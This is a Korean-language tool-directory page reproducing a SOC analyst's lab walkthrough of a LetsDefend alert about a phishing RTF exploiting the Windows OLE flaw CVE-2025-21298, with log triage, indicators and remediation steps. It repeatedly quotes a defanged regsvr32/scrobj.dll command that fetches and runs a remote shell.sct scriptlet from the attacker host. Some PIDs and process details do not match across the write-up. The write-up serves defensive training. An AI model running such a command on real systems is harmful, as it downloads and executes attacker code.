Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Windows OLE 제로클릭 RCE 악용 탐지 (CVE-2025-21298) 워크스루 | Kitploit
도구/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Vulnerability AnalysisExploitationLateral MovementReverse EngineeringForensicsPhishingMalware AnalysisCommand and ControlThreat Intelligence

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
Incident Response
Email Security
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Windows OLE 제로클릭 RCE 악용 탐지 (CVE-2025-21298) 워크스루

저장소 보기웹사이트
2개월 전아직 검토되지 않음

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Windows OLE 제로 클릭 RCE 악용 탐지 (CVE-2025-21298) 워크스루

피싱 이메일

🔎 목차
  1. 상황
  2. 경고 개요
  3. 사용된 도구
  4. 분석
    • 이메일 보안
    • 로그 관리
      • 프록시 로그
    • 엔드포인트 보안
      • 터미널 기록
      • 네트워크 동작
      • 프로세스
      • CVE-2025-21298
  5. 플레이북
  6. 분석가 메모
  7. 참고 자료

(맨 위로)

상황

직원 중 한 명인 Austin이 의심스러운 발신자로부터 피싱 이메일을 받았고, 그가 Outlook에서 이메일을 연 후 2025년 2월 4일 오후 4:18에 경고가 트리거되었습니다. 트리거 사유는 "알려진 CVE-2025-21298 악용 패턴이 식별된 악성 RTF 첨부 파일" 이었습니다.

(맨 위로)

경고 개요

image

EventID : 314

이벤트 시간 : 2025년 2월 4일 오후 4:18 (잘못된 것 같습니다)

규칙 : SOC336 - Windows OLE 제로 클릭 RCE 악용 탐지 (CVE-2025-21298)

등급 : 보안 분석가

SMTP 주소 : 84.38.130.118

출발지 주소 : [email protected]

목적지 주소 : [email protected]

이메일 제목 : Important: Action Required for Upcoming Project Deadline

첨부 파일 : mail.rtf

첨부 파일 해시 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

장치 조치 : 허용됨

트리거 사유 : 알려진 CVE-2025-21298 악용 패턴이 식별된 악성 RTF 첨부 파일.

(맨 위로)

사용된 도구

  1. VirusTotal
  2. AbuseIPDB
  3. Gemini

(맨 위로)

분석

경고 트라이지를 위해 이메일 보안, 로그 관리 및 엔드포인트 보안 로그를 자세히 살펴보겠습니다.

이메일 보안

Screenshot 2026-05-27 151659

발신자 주소인 projectmanagement@pm[.]me를 검색하고 같은 날 오전 5:12에 보낸 "Important: Action Required for Upcoming Project Deadline" 이메일을 클릭했습니다. "Important" 및 "Action Required"와 같은 긴급한 어조와 표현 때문에 피싱 이메일이라는 점을 알 수 있었습니다.



Screenshot 2026-05-27 175944

VirusTotal에서 pm[.]me 도메인을 검색했고 오직 1개의 벤더만 의심스럽다고 판단했습니다.



Screenshot 2026-05-27 151915

그러나 SMTP 주소 84[.]38[.]130[.]118을 검색했을 때 7개의 벤더가 이를 악성 및 멀웨어로 플래그했으며 SILVER C2 서버와 관련이 있었습니다.



Screenshot 2026-05-27 180753 Screenshot 2026-05-27 180810

84[.]38[.]130[.]118은 AbuseIPDB 데이터베이스에서도 발견되었습니다. 이 IP는 라트비아 리가(Riga)에 위치하며 rixhost.lv 도메인에 속하고 DDoS 공격, 해킹 및 악용된 호스트로 분류됩니다.



Screenshot 2026-05-27 152243

마지막으로 첨부 파일 mail.rtf의 해시 df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184를 VirusTotal에서 검색했고 61개 벤더 중 29개가 첨부 파일을 악성으로 플래그했습니다. 이 파일은 rtfmalformb 멀웨어 계열에 속하며 CVE-2025-21298 취약점과 연관되어 있습니다.

악성 첨부 파일이 포함된 피싱 이메일이 Austin에게 전송된 것이 확인되었습니다.

(맨 위로)

로그 관리

Austin이 피싱 이메일을 연 오전 5:12 이후 의심스러운 활동이 있었는지 조사해 보겠습니다.

프록시 로그

Screenshot 2026-05-27 152515

먼저 프록시 로그를 확인하고 발신자의 악성 IP 주소 84[.]38[.]130[.]118을 검색했습니다. 오전 8:06에 cmd.exe에 의해 시작된 HTTP GET 요청이 악성 IP 주소로 hxxp://84[.]38[.]130[.]118/shell[.]sct URL에 전송되어 Windows 스크립틀릿 파일을 다운로드한 것을 발견했습니다. 응답 코드는 200 OK였으며, 이는 아웃바운드 트래픽이 허용되었고 방화벽에 의해 차단되지 않았음을 나타냅니다. 역방향 셸 스크립트를 포함할 가능성이 있는 스크립트 파일이 수신된 것은 비정상적이었습니다.

(맨 위로)

엔드포인트 보안

터미널 기록

image Screenshot 2026-05-27 153447

악성 IP 주소로의 아웃바운드 트래픽이 cmd.exe에 의해 시작되었기 때문에 먼저 터미널 기록을 확인했습니다. 오전 8:06:08에 "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" 명령이 실행되어 scrobj.dll이 악성 IP 주소에서 스크립트 파일을 가져오기 위해 regsvr32.exe를 실행한 것을 발견했습니다.

  • regsvr32.exe: Windows 레지스트리에서 DLL 및 ActiveX 컨트롤과 같은 OLE 컨트롤을 등록하고 등록 해제하는 명령줄 유틸리티
  • /s: regsvr32.exe가 백그라운드에서 조용히 실행됨
  • /u: Windows가 이 키를 Windows 레지스트리에 추가하지 않도록 강제함
  • /i: 인터페이스
  • scrobj.dll: 스크립틀릿 파일을 처리하는 Script Object Runtime Library

Windows의 기본 제공 유틸리티를 사용하여 스크립트를 가져오면 시스템에 남는 흔적이 최소화되어 리버스 엔지니어링과 멀웨어 분석 과정이 더 어려워질 수 있습니다!

(맨 위로)

네트워크 동작

Screenshot 2026-05-27 153102

명령 실행 이벤트 이후인 오전 8:06:42에 악성 IP 84[.]38[.]130[.]118로의 연결이 있었던 것이 확인되었습니다.

(맨 위로)

프로세스

그렇다면 이메일을 클릭만 했는데 왜 cmd.exe가 실행되었을까요? Austin이 악성 첨부 파일 mail.rtf를 다운로드했다는 증거는 발견되지 않았지만, 엔드포인트 로그를 확인하고 오전 8:06 근처의 이벤트를 검색했습니다.

Screenshot 2026-05-27 153636

프로세스 ID: 7023

이벤트 시간: 2025년 2월 4일 오전 8:06:25

명령줄: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

부모 프로세스: cmd.exe



Screenshot 2026-05-27 153616

그럼 부모 프로세스인 cmd.exe를 살펴보겠습니다.

프로세스 ID: 6784

이벤트 시간: 2025년 2월 4일 오전 8:06:08

명령줄: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

부모 프로세스: outlook.exe



Screenshot 2026-05-27 154136

마지막으로 outlook.exe의 부모 프로세스도 확인했습니다.

프로세스 ID: 4820

이벤트 시간: 2025년 2월 4일 오전 8:05:15

명령줄: "C:\Windows\System32\cmd.exe"

부모 프로세스: explorer.exe



따라서 악성 프로세스는 다음과 같은 트리로 정리할 수 있습니다:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! 스크립트 실행 !

그러나 CVE-2025-21298에 대한 정보를 찾기 전까지는 악성 첨부 파일을 다운로드하거나 열지 않았는데도 어떻게 악성 프로세스가 시작되었는지, 그리고 어떻게 outlook.exe가 악성 프로세스를 생성했는지 여전히 의문이었습니다.

(맨 위로)

CVE-2025-21298

Screenshot 2026-05-27 201652

Offsec의 기사에 따르면, 2025년 1월에 이메일을 통한 RCE를 가능하게 하는 CVSS 점수 9.8의 심각한 Windows OLE 제로 클릭 취약점이 있었습니다. 대상 수신자가 Microsoft Outlook에서 악성 이메일(악성 스크립트가 포함된 RTF 문서 포함)을 열거나 미리 보기만 해도 취약점이 트리거되어 공격자가 영향을 받는 시스템에서 임의 코드를 실행할 수 있습니다.

Windows OLE와 RTF 문서의 하이재킹 프로세스에 대해 Google과 Gemini에서 조사했고, 제가 알고 있는 리버스 엔지니어링 지식과 관련지어 보았습니다:

  1. RTF 문서를 열거나 미리 볼 때 ole32.dll 내부의 UtOlePresStmToContentsStm 함수가 pstmContents가 가리키는 OLE 개체를 사용하여 썸네일 이미지 데이터(OlePres)를 읽고 실제 데이터 파일(CONTENT)로 덤프합니다.
  2. 이 함수는 공격자의 RTF 파일 형식이 손상되어 예기치 않은 처리 오류를 즉시 트리거하므로 OLE 개체는 삭제되지만 pstmContents 포인터는 삭제되지 않습니다.
  3. 악성 RTF 파일은 삭제된 OLE 개체와 정확히 동일한 크기의 악성 코드를 포함하는 악성 OLE 개체를 만들어 pstmContents 포인터가 여전히 가리키는 동일한 메모리 공간을 채웁니다.
  4. Outlook이 미리 보기를 마친 후, 악성 가짜 OLE 개체 내부에 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"이라는 악성 코드가 포함된 가짜 "정리" 프로세스를 실행합니다.
  5. 피해자의 시스템은 원격 페이로드를 실행하고 클릭 없이 자동으로 역방향 셸을 구축합니다.

(맨 위로)

플레이북

Screenshot 2026-05-28 144059 Screenshot 2026-05-28 144109 Screenshot 2026-05-28 144141 Screenshot 2026-05-28 144154 Screenshot 2026-05-28 144226 Screenshot 2026-05-28 144240

격리되지 않음

Screenshot 2026-05-28 144252

악성

Screenshot 2026-05-28 144306

액세스됨

Screenshot 2026-05-28 144316 Screenshot 2026-05-28 144343 Screenshot 2026-05-28 144730 Screenshot 2026-05-28 144804 Screenshot 2026-05-28 144844 Screenshot 2026-05-28 144940 Screenshot 2026-05-28 145001

(맨 위로)

분석가 메모

분류: 심각(Critical)

유형: 멀웨어

활동 시간:

2025년 2월 4일 오전 5:12 (피싱 이메일 수신)

2025년 2월 4일 오전 8:05:15 - 2025년 2월 4일 오전 8:06:42 (피싱 이메일 열림 및 악성 코드 실행)

영향받은 개체:

출발지 주소: projectmanagement@pm[.]me

SMTP 주소: 84[.]38[.]130[.]118

수신자 이메일 주소: Austin@letsdefend[.]io

수신자 IP 주소: 172[.]16[.]17[.]137

호스트명: Austin

True positive 판정 사유:

2025년 2월 4일 오전 5:12에 "Important: Action Required for Upcoming Project Deadline"이라는 제목의 의심스러운 이메일이 [email protected](IP 주소: 84.38.130.118)에서 [email protected](IP 주소: 172.16.17.137)로 첨부 파일 mail.rtf(SHA256 해시: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)와 함께 전송되었습니다. 제목에 사용된 긴급한 어조와 표현은 피싱 이메일임을 시사했습니다. Threat Intel인 VirusTotal과 AbuseIPDB는 라트비아 리가(Riga)에 위치하고 rixhost.lv 도메인에 속하는 발신자의 IP 주소와 첨부 파일을 악성 및 멀웨어로 플래그했습니다.

프록시 로그에 따르면, 오전 8:06에 cmd.exe에 의해 시작된 HTTP GET 요청이 악성 IP 주소로 hxxp://84[.]38[.]130[.]118/shell[.]sct URL에 전송되어 Windows 스크립틀릿 파일을 다운로드했습니다. 응답 코드는 200 OK였으며, 이는 악성 IP 주소로의 아웃바운드 트래픽이 허용되었고 방화벽에 의해 차단되지 않았음을 나타냅니다.

엔드포인트 보안 로그에 따르면, 악성 코드 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"(PID: 7023)은 outlook.exe(PID: 4820)에서 생성된 cmd.exe(PID: 6784)에 의해 실행되었습니다.

이 악용은 2025년 1월에 이메일을 통한 RCE를 가능하게 하는 CVSS 점수 9.8의 심각한 Windows OLE 제로 클릭 취약점(CVE-2025-21298)으로 인해 발생했습니다. 대상 수신자가 Microsoft Outlook에서 악성 스크립트가 포함된 유해한 RTF 문서가 포함된 악성 이메일을 열거나 미리 보기만 해도 취약점이 트리거되어 공격자가 영향받는 시스템에서 임의 코드를 실행하고 잠재적으로 C2 서버에 역방향 셸을 구축할 수 있습니다.

에스컬레이션 사유:

활성화된 사후 악용 C2 네트워크 트래픽이 아직 명확하게 관찰되지는 않았지만, 엔드포인트 보안 로그에서 scrobj.dll을 사용하는 regsvr32.exe가 스크립틀릿 파일 shell.sct를 가져오는 실행을 확인했습니다. CVE-2025-21298의 CVSS 점수가 9.8이므로 호스트에서 지속성 또는 데이터 유출과 같은 의심스러운 활동이 있는지 추가 조사가 필요합니다.

수정 조치:

  • 호스트 Austin을 회사 내부 네트워크에서 즉시 분리하십시오.
  • "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" 프로세스와 관련 프로세스인 cmd.exe, outlook.exe를 종료하십시오.
  • 84[.]38[.]130[.]118로의 아웃바운드 트래픽을 차단하십시오.
  • rixhost[.]lv 도메인을 블랙리스트에 추가하십시오.
  • 이메일 서버에서 발신자 projectmanagement@pm[.]me를 블랙리스트에 추가하십시오.
  • CVE-2025-21298 취약점을 패치하십시오.
  • Austin의 자격 증명을 재설정하십시오.
  • 호스트 Austin에서 shell.sct 실행 후 C2 연결, 지속성, 데이터 유출과 같은 악성 활동을 조사하기 위해 메모리 분석을 수행하십시오.
  • shell.sct에 대한 리버스 엔지니어링을 수행하십시오.
  • 이메일 헤더의 발신 IP 및 반송 주소를 조사하기 위해 이메일 분석을 수행하십시오.
  • regsvr32.exe에 의해 시작된 인터넷 액세스를 차단하십시오.
  • 알 수 없는 발신자의 이메일이나 긴급한 어조 또는 표현이 포함된 이메일을 열지 않도록 직원을 교육하기 위한 피싱 인식 캠페인을 진행하십시오.

침해 지표:

  • 보낸 사람 주소: projectmanagement@pm[.]me
  • 보낸 사람 IP 주소: 84[.]38[.]130[.]118 보낸 사람 도메인: rixhost[.]lv
  • 피싱 이메일: "중요: 다가오는 프로젝트 마감일에 대한 조치 필요"
  • 악성 문서: mail.rtf (SHA256 해시: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
  • 악성 프로세스 트리: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
  • 두 번째 페이로드 URL: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

(맨 위로)

참조

CVE-2025-21298 세부 정보

CVE-2025-21298: 심각한 Windows OLE 제로클릭 취약점

(맨 위로)

도구 다운로드